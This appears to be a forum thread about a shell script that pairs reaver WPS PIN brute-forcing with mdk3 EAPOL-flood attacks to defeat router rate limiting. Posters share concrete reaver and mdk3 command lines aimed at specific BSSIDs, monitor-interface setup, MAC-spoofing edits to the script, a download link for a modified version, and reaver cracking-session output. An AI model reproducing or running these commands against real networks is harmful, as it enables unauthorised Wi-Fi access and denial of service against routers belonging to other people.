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Reaver "AP rate limiting detected" and automatic mdk3 solution


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About 60% down the script (well, the old one at least. Just search for it) there's a chunk responsible for invoking wash with the appropriate parameters. Just search for "wash" and I'm sure it'll pop up.

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I'm getting the following error when I try to execute "reaver -i -b 00:04:DF:79:B6:6F -S -l 10 -N -vv" doesn't matter which flood attack I choose, I keep getting

No replay interface specified.

"aireplay-ng --help" for help.
Please Wait...
The script that is being executed is:

mdk3 x 0 -t 00:04:DF:79:B6:6F -n Mayara/Anderson -s 200 & mdk3 x 0 -t 00:04:DF:79:B6:6F -n Mayara/Anderson -s 200 & mdk3 x 0 -t 00:04:DF:79:B6:6F -n Mayara/Anderson -s 200

Any idea on how to solve this?

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This is from memory, but I believe the -i parameter to reaver should've been followed by the interface name to use, which should be something like mon0

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  • 4 months later...

I would like to offer the following humle recommendations for the ReVdK3-r2.sh script.

First is the section where we create the three new monitor segments. The problem is that the wlan0mon is defined, which is silly since we already define WLAN as a string.

So I changed this:

airmon-ng start wlan0;
iw wlan0mon interface add mon0 type monitor & iw wlan0mon interface add mon1 type monitor & iw wlan0mon interface add mon2 type monitor;


to this:

airmon-ng start $WLAN;


iw $WLANxMON interface add mon0 type monitor & iw $WLANxMON interface add mon1 type monitor & iw $WLANxMON interface add mon2 type monitor;


The same problem arise when we want to spoof the mac address. Again we have a segment where the wlanXmon is predefined for us (which is a problem if we use wlan1)


which can be changed to this:


I would also like to suggest a replacement where this

macchanger -m '78:03:40:02:94:8f' "$WLAN"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON1"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON2"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON3"> /dev/null;

can be replaced with this

macchanger -a "$WLAN"> /dev/null;
macchanger -a "$MON1"> /dev/null;
macchanger -a "$MON2"> /dev/null;
macchanger -a "$MON3"> /dev/null;

but this is only relevant in the case where we want all the macs to be different. Furthermore, I am not that well into the mdk3 code so I am not sure whether it is mandatory to have the same mac on all three monitors.

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The EAPOL Start attack seems to be ineffective against the newer TP-Link routers. I tried it against an Archer8 type and although I sent about 40000 packages on each interface, the router just kept happily going.

So it would seem that the manufacturers has found a way to protect against this kind of attack.


Btw, the script seems to work flawlessly on my machine with the new editions.

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  • 11 months later...

Hello everybody,

Sorry for the up...but it's a very useful topic and i encounter a issue.

With the last modified version http://www.datafilehost.com/d/888bcb3c everything works until the attack with reaver begun.

It blocks on :

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching mon0 to channel 1
[?] Restore previous session for 00:37:B7:7E:0B:BE? [n/Y] [+] p1_index set to 6
[+] p2_index set to 0
[+] Restored previous session
[+] Waiting for beacon from 00:37:B7:7E:0B:BE

and somtimes it switch to

No source MAC (-h) specified. Using the device MAC (78:03:40:02:94:8F)
22:09:04  Waiting for beacon frame (BSSID: 00:37:B7:7E:0B:BE) on channel 1
22:09:14  No such BSSID available.
Please Wait...


No problem when i start revear basically :

root@kaliTesting:~# reaver -i wlan1mon -b 00:37:B7:7E:0B:BE -S -c 1 -d 15 -l 10 -N -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching wlan1mon to channel 1
[?] Restore previous session for 00:37:B7:7E:0B:BE? [n/Y] n
[+] Waiting for beacon from 00:37:B7:7E:0B:BE
[+] Associated with 00:37:B7:7E:0B:BE (ESSID: Livebox-0BBE)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 10 seconds before re-checking

Thank you very much and have a good day.

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  • 6 months later...

My first encounter with AP rate limiting has led me to believe that it is a curse :)

I apologize for being a retard in advance... my solution was to just to test WPS 1.0... as opposed to WPS 2.0... so I was lucky that way, I came online to find out why AP rate limiting is an issue... and I must say repzeroworld has added something I can chew upon. I have not yet encountered my cursed friend on 1.0.... now I realize this forum topic is about 2. 0 but I thought I would make the distinction... there is much i need to think about... I originally thought I could use python to script a sudo macchanger -r but that proved complicated... I'm still working on it... thank you for being here and live long and prosper... I will work on what has been written  and come back.

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  • 2 months later...

Hi , I am trying to use ReVdK3-r1.sh but no success.

The terminal auto close after i input Enter on



reaver -i mon0 -b 70:4F:57:AA:6D:62 -S -l 10 -N -vv

Are you satisified with this configuration? if not,  input 'r' and you will be returned to Reaver's Configuration Wizard:

any solution ?

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